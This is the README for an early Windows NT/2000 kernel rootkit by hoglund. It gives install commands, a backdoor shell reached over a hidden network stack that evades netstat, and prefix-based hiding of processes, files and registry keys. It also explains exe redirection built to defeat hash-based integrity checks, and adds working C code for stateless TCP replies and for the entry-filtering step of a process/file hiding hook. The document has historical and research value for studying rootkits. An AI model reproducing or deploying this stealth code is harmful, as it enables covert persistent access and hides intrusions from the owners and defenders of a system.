NT RootKit

by hoglund

NT RootKit 0.31

NT RootKit 0.40


Alpha build - debug 0.40

This has been tested and is known to work under NT 4.0 Server (build 1381).
This has been tested and is known to work under Windows 2000 RC2 (build 2128).

Note: this debug build of the rootkit generates huge amounts of debug messages.
You can watch these with a tool such as DbgView from www.sysinternals.com (or equivalent).

To test out the rootkit, copy deploy.exe and _root_.sys to a common directory.

To install and start the rootkit, run deploy.exe.

To start and stop the rootkit at runtime, use the following commands, respectively:

net start _root_
net stop _root_

NEWS
----

Keyboard sniffing has been disabled for now.
You can comment the line back in DriverEntry() if you're daring.
Keyboard sniffing actually works fine, except that it has caused a BSOD
on one of my test machines and I didn't want to release it that way
until the problem could be debugged.

New features:

Embedded TCP/IP stack (stateless)
---------------------------------

NT ROOTKIT has a stateless TCP/IP stack.
Rather than keeping a connection table, it infers the state of a connection from what is
in each incoming packet (its flags, sequence number and acknowledgement number).
This works fine for all tests we have performed on the local segment.
It has not yet been tested across the Internet, where latency, loss and reordering come into play.

The ROOTKIT answers a hardcoded IP address.
As delivered, this IP address is 10.0.0.166. If you have a client machine
configured with a 10.x address on the same segment, it should be able to telnet to the rootkit.
Keep in mind that the rootkit talks to your Ethernet adapter directly, below the NT stack,
so it can do some things an ordinary network service cannot.
First, you will notice that the target port does not matter.
You can telnet to any port and it will work.
Second, you will notice that multiple people can log into the rootkit at once.
The sessions are not kept separate, but testing has shown that it works quite well
as long as two people aren't typing commands at exactly the same time.

NOTE: THIS MEANS THAT THE ROOTKIT DOES NOT SHOW UP IN NETSTAT

Indeed, why would it? It's not using the NT stack, so there is no socket for netstat to list.

Gotcha: the rootkit's IP address had better not conflict with a real machine on your network,
or the two will fight over ARP replies for that address (an ARP war), and that is not good.
Get this: the rootkit needs to use a unique IP address!
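How a stateless responder decides its reply, as an added example for this README (it is not the rootkit's code): the flags of the incoming segment tell it which step of the conversation it is at, and the peer's acknowledgement number tells it what its own next sequence number must be, so no per-connection state is stored anywhere. The constant initial sequence number, the cut-down header layout (20-byte TCP header, no options, no checksum, no IP or Ethernet layers) and the sample SYN bytes are assumptions made for the example.

```c
/* stateless_tcp.c: how a stateless TCP responder picks its reply from the
 * incoming segment alone. Added example for this README; not the rootkit's
 * code. Header layout is RFC 793 with no options; checksums and the IP and
 * Ethernet layers are left out (assumptions for the example). */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

enum { TH_FIN = 0x01, TH_SYN = 0x02, TH_RST = 0x04, TH_PSH = 0x08, TH_ACK = 0x10 };

typedef struct {
    uint16_t sport, dport;
    uint32_t seq, ack;
    uint8_t  flags;
    uint16_t payload_len;
} tcp_seg;

/* A stateless stack has nowhere to remember a per-connection ISN, so it
 * uses a constant. The value is an assumption, not the driver's. */
#define FIXED_ISN 0x12345678u

static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t rd32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}

/* Pull the fields we decide on out of a raw TCP segment (network byte order).
 * Returns 0 on success, -1 if the buffer is short or the data offset is bogus. */
int parse_tcp(const uint8_t *buf, size_t len, tcp_seg *s)
{
    if (len < 20) return -1;
    size_t hdr_len = (size_t)(buf[12] >> 4) * 4;
    if (hdr_len < 20 || hdr_len > len) return -1;
    s->sport = rd16(buf);
    s->dport = rd16(buf + 2);
    s->seq   = rd32(buf + 4);
    s->ack   = rd32(buf + 8);
    s->flags = buf[13];
    s->payload_len = (uint16_t)(len - hdr_len);
    return 0;
}

/* Decide the reply from `in` alone; no connection table is consulted.
 * Our next sequence number is whatever the peer's ACK says it is, and the
 * peer's next byte is in->seq plus what it just sent. `reply_len` is the
 * number of payload bytes the shell wants to push back. Returns 1 if a
 * segment should be sent, 0 to stay silent. */
int stateless_reply(const tcp_seg *in, uint16_t reply_len, tcp_seg *out)
{
    memset(out, 0, sizeof *out);
    out->sport = in->dport;               /* any destination port works: */
    out->dport = in->sport;               /* the reply just swaps the pair */

    if (in->flags & TH_RST)
        return 0;                         /* a reset is never answered */

    if ((in->flags & (TH_SYN | TH_ACK)) == TH_SYN) {
        out->flags = TH_SYN | TH_ACK;     /* handshake step two */
        out->seq   = FIXED_ISN;
        out->ack   = in->seq + 1;         /* the SYN consumes one sequence number */
        return 1;
    }

    out->seq = in->ack;                   /* the peer tells us where our stream is */
    out->ack = in->seq + in->payload_len; /* acknowledge what it just sent */

    if (in->flags & TH_FIN) {
        out->ack  += 1;                   /* the FIN consumes one sequence number too */
        out->flags = TH_FIN | TH_ACK;     /* close both directions at once */
        return 1;
    }

    if (in->payload_len == 0 && reply_len == 0)
        return 0;                         /* answering a bare ACK would loop forever */

    out->flags = (uint8_t)(TH_ACK | (reply_len ? TH_PSH : 0));
    out->payload_len = reply_len;
    return 1;
}

int main(void)
{
    /* Constructed SYN from port 40000 to port 23, seq 1000, no options. */
    static const uint8_t syn[20] = { 0x9c,0x40, 0x00,0x17, 0x00,0x00,0x03,0xe8,
                                     0x00,0x00,0x00,0x00, 0x50,0x02, 0x20,0x00,
                                     0x00,0x00, 0x00,0x00 };
    tcp_seg in, out;
    if (parse_tcp(syn, sizeof syn, &in) == 0 && stateless_reply(&in, 0, &out))
        printf("SYN to port %u -> flags 0x%02x seq %u ack %u\n",
               in.dport, out.flags, out.seq, out.ack);
    return 0;
}
```

Because each reply depends only on the segment in hand, two telnet clients whose segments interleave each get consistent answers, which is why several people can be logged in at once. The cost is that a retransmitted or reordered segment is answered as if it were fresh, and a constant ISN makes the responder's side of the conversation predictable to anyone watching the wire.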


Command Shell
-------------

We have experimented with launching win32 processes from kernel mode.  This has been non-trivial. 
We have demonstrated this working at Blackhat - but the feature is disabled in this build.
It will be added back in for the 044 branch - but there are many kinks still being worked out.

HIDE PROCESSES
--------------

Any process that starts with '_root_' will be hidden.
This feature can be toggled on/off from the k-mode shell.
Just login and type 'hideproc' to toggle.

HIDE FILES AND DIRS
-------------------

Any directory or file whose name starts with '_root_' will be hidden.
This feature can be toggled from the k-mode shell. Just login and type 'hidedir' to toggle.

Processes whose names start with '_root_' are exempt from these rules.
This means that if you're running a shell as '_root_cmd.exe' you can still see the hidden stuff,
and that '_root_taskmgr.exe' can still see hidden processes.
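The common shape of the process hiding and the file/directory hiding above, as an added example for this README (not the rootkit's own code): the usual hook points for both, NtQuerySystemInformation for processes and NtQueryDirectoryFile for directory listings, hand back a buffer of variable-size entries chained by a NextEntryOffset field, and a filtering hook walks that chain, unlinks every entry whose name starts with '_root_', and leaves the list alone when the calling process is itself a '_root_' program. Whether the rootkit hooks exactly these calls is an assumption; the entry layout is cut down to the chaining field and a name, hook installation is not shown, and the process names are constructed sample data.

```c
/* prefix_hide.c: the filtering step of a "hide anything named _root_*" hook,
 * run over a NextEntryOffset-chained result buffer of the kind
 * NtQuerySystemInformation (processes) and NtQueryDirectoryFile (files)
 * return. Added example for this README; not the rootkit's code. Hook
 * installation is not shown, and the entry layout is a cut-down stand-in. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define HIDE_PREFIX "_root_"

/* Stand-in for SYSTEM_PROCESS_INFORMATION / FILE_BOTH_DIR_INFORMATION:
 * only the chaining field and a name are kept (assumption for the example). */
typedef struct {
    uint32_t next_offset;   /* bytes from this entry to the next; 0 marks the last */
    char     name[32];
} entry_t;

static int has_hide_prefix(const char *name)
{
    return strncmp(name, HIDE_PREFIX, sizeof HIDE_PREFIX - 1) == 0;
}

static entry_t *next_entry(entry_t *e)
{
    return e->next_offset ? (entry_t *)((uint8_t *)e + e->next_offset) : NULL;
}

/* Bytes from `e` to the end of the chain it heads. */
static size_t chain_bytes(entry_t *e)
{
    size_t total = 0;
    while (e->next_offset) { total += e->next_offset; e = next_entry(e); }
    return total + sizeof *e;
}

/* Number of entries reachable from `e`. */
size_t count_entries(entry_t *e)
{
    size_t n = 0;
    for (; e; e = next_entry(e)) n++;
    return n;
}

/* Drop every entry whose name starts with "_root_" from the chain at `buf`,
 * in place, unless the caller is itself a "_root_" program, which is exempt
 * and gets the unfiltered list. Returns how many entries remain visible. */
size_t filter_entries(entry_t *buf, const char *caller_name)
{
    if (has_hide_prefix(caller_name))
        return count_entries(buf);        /* _root_taskmgr.exe sees everything */

    /* The caller reads from `buf`, so a hidden head cannot be skipped by
     * pointer: slide the rest of the chain down over it instead. */
    while (has_hide_prefix(buf->name)) {
        entry_t *rest = next_entry(buf);
        if (!rest) {                      /* everything was hidden */
            buf->name[0] = '\0';
            return 0;
        }
        memmove(buf, rest, chain_bytes(rest));
    }

    /* Unlink interior and trailing hidden entries by widening prev's jump;
     * if the hidden entry was the last one, prev becomes the last. */
    for (entry_t *prev = buf, *cur; (cur = next_entry(prev)) != NULL; ) {
        if (has_hide_prefix(cur->name))
            prev->next_offset = cur->next_offset ? prev->next_offset + cur->next_offset : 0;
        else
            prev = cur;
    }
    return count_entries(buf);
}

/* Lay `n` names out as a contiguous chain in `buf` (constructed sample data). */
void build_chain(entry_t *buf, const char **names, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        buf[i].next_offset = (i + 1 < n) ? (uint32_t)sizeof(entry_t) : 0;
        strncpy(buf[i].name, names[i], sizeof buf[i].name - 1);
        buf[i].name[sizeof buf[i].name - 1] = '\0';
    }
}

int main(void)
{
    const char *names[] = { "_root_svc.exe", "winlogon.exe", "_root_cmd.exe",
                            "_root_x.exe", "explorer.exe", "_root_last.exe" };
    entry_t chain[6];
    build_chain(chain, names, 6);
    printf("taskmgr.exe sees %zu of 6\n", filter_entries(chain, "taskmgr.exe"));
    for (entry_t *e = chain; e; e = next_entry(e)) printf("  %s\n", e->name);
    return 0;
}
```

The two pitfalls a filtering hook has to get right are both exercised here: a hidden entry at the head of the buffer cannot be skipped by moving a pointer, because the caller reads from the start of the buffer it passed in, so the remainder is slid down over it; and when the hidden entry is the last one, the previous entry must take over its terminating zero offset, or the caller walks off the end of the buffer.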


Test EXE redirection:
---------------------

For now, this test is hard coded.  To test, first carry out the following:

Copy 'calc.exe' to C:\
Copy any other executable to C:\ and rename it so that the first 6 characters of the filename are '_root_'.
CMD.EXE was tested, so it would be renamed to "C:\_root_cmd.exe".

The rootkit will detect the execution of a filename that starts with '_root_' and redirect it to "C:\calc.exe".
Try executing the file and you will see that calc.exe gets executed instead.

Now, with the rootkit stopped, open '_root_cmd.exe' (or equivalent) in a hex editor.
Now start the rootkit and open it again.
Note that the images are exactly the same! You are looking at the same file.
Now open calc.exe and verify that it is different.
As you can see, the rootkit does not affect the ability to read a file correctly.
The rootkit only becomes involved when the file is executed.
This should fool programs that check files by CRC or hash, since they read the file rather than execute it.
The flip side for anyone checking a machine: an integrity checker that reads the file from disk sees the
genuine bytes, so catching this redirection means comparing against the image actually mapped into the running process.

  
Test Registry Hiding:
---------------------

Any value or key whose name begins with the 6 letters '_root_' should be hidden
from view. regedit.exe and regedt32.exe were tested.

Additionally, any running program whose name begins with '_root_' is
exempt from any subterfuge; hence,
if you make a copy of regedit.exe called '_root_regedit.exe', the new copy
of regedit will be able to see all of the hidden keys! (neato)

Try starting and stopping the rootkit dynamically and refreshing your view of the registry, also.
You will see that it is working.